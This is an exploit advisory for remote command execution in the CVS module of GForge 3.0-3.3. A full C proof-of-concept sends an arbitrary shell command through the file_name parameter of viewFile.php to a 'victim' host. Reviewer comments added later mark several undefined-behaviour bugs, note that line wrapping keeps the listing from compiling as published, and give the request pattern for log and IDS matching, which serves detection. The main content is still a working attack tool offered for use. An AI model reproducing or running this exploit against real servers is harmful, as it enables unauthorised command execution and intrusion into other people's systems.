GForge 3.x remote command execution exploit that makes use of a flaw in the CVS modules.
3744f3a711daa6de0ebf219d09ae9702a6d0c963ed719af191c9abb3fb0d5ffa
Author: L|On
Homepage: http://www.bastardsoperatorsfromhell.org
Description: GForGE 3.x Remote Execute Command Exploit
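GForge (www.gforge.org) is software that supports collaborative development
for software communities. It provides a fully configured development system
with tools for communication and version control among the members of a
development team, on a web site. The GForge CVS modules have a remote command
execution vulnerability that can be exploited by malicious attackers.
In the proof of concept below, the request targets viewFile.php and carries the
command in the file_name query parameter between URL-encoded newlines (%0A),
which suggests that this parameter reaches a shell command unsanitised. Requests
for viewFile.php with %0A inside file_name are the matching access-log indicator.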
Vulnerability Class: FileHandler.class
Affected versions: 3.0 - 3.3 (4.x not tested)
Files containing the vulnerable code:
viewFile.php,v 1.1.1.1 2004/08/09 21:12:16
viewFile.php,v 1.4 2003/10/25 22:46:13
Proof of Concept ExPlOiT by L|On lion@avatarcorp.org :
/***********************************************************
* GFORGE 3.0 - 3.3 POF EXPLOIT ver. 1.0 *
* Remote System Code Execution *
* by L|On 06 Apr 2005 *
* lion@avatarcorp.org - www.bastardsoperatorsfromhell.org *
* Thank's to all brother on #BOFH.IT *
***********************************************************/
#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
/* Loop bound in main() (it runs while i++ < MAX_SIZE, i.e. once) and the base
 * used to size main()'s temp[] and name[] arrays. */
#define MAX_SIZE 1
/* Default request path; main() uses it to initialise location[], and -l replaces it. */
#define DEF_PATH "/scm/viewFile.php"
/* NOTE(review): inverted relative to the usual C convention (FALSE is -1, TRUE
 * is 0). In this file they are only assigned to and compared against testbug
 * by name, never used as a bare truth value. */
#define FALSE -1
#define TRUE 0
/*
 * Print the banner and the option summary to stderr, then terminate the
 * process with exit status 1. This function does not return.
 *
 * cmd: program name substituted for %s in the "Usage:" line (main() passes
 *      argv[0] when -h is given).
 *
 * NOTE(review): the string literals below are hard-wrapped in this listing
 * (a literal is opened on one line and closed on the next), so the text is not
 * valid C as published.
 */
void usage_form(char *cmd){
fprintf(stderr,"\nGForGE 3.0 - 3.3 POF ExPlOiT by L|On 06 Apr
2005\n"
"lion@avatarcorp.org -
www.bastardsoperatorsfromhell.org\n"
"-------------------------------------------------\n"
"Usage: %s -t <target> [-l <link_path>] [-c
<cmd_send>] [-h]\n\n"
"target : victim_host\n"
"link_path : fukk path where locate bad php
file (default: /scm/viewFile.php)\n"
"cmd_send : command to send victim to test
bug\n\n", cmd);
/* Help is treated as a terminal action: nothing runs after the usage text. */
exit(1);
}
/*
 * Entry point: parses -t/-l/-c/-h, assembles one HTTP/1.0 GET request for the
 * viewFile.php path and sends it to TCP port 80 of the target host.
 *
 * Request as assembled below (the shape to match in web-server logs or IDS
 * rules):
 *   GET <location>?group_id=5&file_name=%0A<cmd_send>%0a HTTP/1.0
 *   Host: <target>
 * With -c the response is read back and printed to stderr, then the process
 * exits 0. Exit status is 1 when no target is given, 2 when the request
 * buffer cannot be allocated, and the printf() character count on resolver
 * or connect failure.
 *
 * NOTE(review): this listing has several undefined-behaviour defects
 * (uninitialised reads, unbounded strcat, undersized allocation; marked
 * inline). Its outcome is therefore not dependable either way: a crash or an
 * empty reply from this tool is not evidence that a host is patched. Confirm
 * exposure from the installed GForge version and the server's access logs.
 * Some literals and one comment are also hard-wrapped in this listing, so it
 * is not valid C as published.
 */
int main(int argc, char *argv[])
{
int s, i = 0;
int testbug = FALSE;
struct sockaddr_in victem;
struct hostent *he;
/* NOTE(review): getopt() returns int; holding it in a char makes the
 * != EOF comparison below unreliable where plain char is unsigned. */
char opt;
/* Request path, 50 bytes including the terminator; see the -l case. */
char location[50] = DEF_PATH;
/* NOTE(review): left uninitialised; only -c assigns it. */
char *evilcode;
char *target = NULL;
char *buffer;
/* Receive buffer for the HTTP response when -c is used. */
char cgibuff[40000];
/* Only index 1 of temp[] and name[] is ever used. */
char *temp[MAX_SIZE + 2];
char *name[MAX_SIZE + 2];
char *get_html = "GET ";
char *host_html = "Host: ";
/* Hex-escaped query-string prefix; decodes to "?group_id=5&file_name=%0A". */
char *vcode={"\x3f\x67\x72\x6f\x75\x70\x5f\x69\x64\x3d\x35\x26"
"\x66\x69\x6c\x65\x5f\x6e\x61\x6d\x65\x3d\x25\x30"
"\x41"};
while((opt = getopt(argc, argv, "t:l:c:h")) != EOF){
switch(opt)
{
case 't':
target = optarg;
break;
case 'l':
/* NOTE(review): unbounded copy of a command-line argument into the
 * 50-byte location[]; a longer -l value overflows the stack buffer. */
location[0] = '\0';
strcat(location, optarg);
break;
case 'c':
/* -c both supplies the command text and switches on response reading. */
testbug = TRUE;
evilcode = optarg;
break;
case 'h':
usage_form(argv[0]);
break;
}
}
if(target == NULL){
fprintf(stderr,"No target specified, try -h for help\n");
exit(1);
}
/* Query string: vcode + command + "%0a HTTP/1.0\n".
 * NOTE(review): malloc() result is not checked and the memory is not
 * initialised before the first strcat(); evilcode is read even when -c was
 * not given; the fixed 1000 bytes do not bound the appended argument. */
temp[1] = malloc(1000);
strcat(temp[1], vcode);
strcat(temp[1], evilcode);
strcat(temp[1], "%0a HTTP/1.0\n");
/* gethostbyname() resolves IPv4 names/addresses only; failure exits with the
 * printf() return value as status. */
if ((he=gethostbyname(target)) == NULL) exit(printf("Error getting
hostname"));
name[1] = "Send Evil Code...";
/* MAX_SIZE is 1, so this body runs exactly once. */
while(i++ < MAX_SIZE){
/* NOTE(review): the size covers the five strings plus one byte, but the code
 * then appends "\n" (and a second "\n" with -c) as well as the terminator, so
 * the allocation is short; the block is also uninitialised before strcat(). */
if((buffer = (char *) malloc (strlen(get_html) +
strlen(location) + strlen(temp[1]) + strlen(host_html) + strlen(target)
+ 1)) == NULL){
perror("(malloc buffer)");
exit(2);
}
strcat(buffer, get_html);
strcat(buffer, location);
strcat(buffer, temp[1]);
strcat(buffer, host_html);
strcat(buffer, target);
strcat(buffer, "\n");
/* The blank line that terminates the HTTP header block is only added with -c. */
if (testbug == TRUE) strcat(buffer, "\n");
/* Echoes the full request locally. NOTE(review): %d is given a size_t. */
printf("\n%s** %d\n\n", buffer, strlen(buffer));
/* Plain TCP to port 80; socket() result is not checked and victem is not
 * zeroed before its fields are filled in. */
s=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&victem.sin_addr, he->h_length);
victem.sin_family=AF_INET;
victem.sin_port=htons(80);
if (connect(s, (struct sockaddr*)&victem, sizeof(victem))<0)
exit(printf("Connect error"));
cgibuff[0] = '\0';
fprintf(stderr,"%s...",name[1]);
send(s, buffer, strlen(buffer),0);
if (testbug == TRUE){
/* NOTE(review): recv()'s return value is discarded and the received bytes
 * are not NUL-terminated, so the strlen()/%s below can read past the data;
 * only the empty-response case is covered by cgibuff[0] = '\0' above. */
recv(s, cgibuff, sizeof(cgibuff),MSG_WAITALL); // MSG_WAITALL for
recive entire text
if(strlen(cgibuff) != 0) fprintf(stderr,"\n%s\n", cgibuff);
close(s);
exit(0);
}
printf("DONE\n");
close(s);
/* buffer and temp[1] are never freed; the process ends right after. */
buffer[0] = '\0';
}
return 0;
}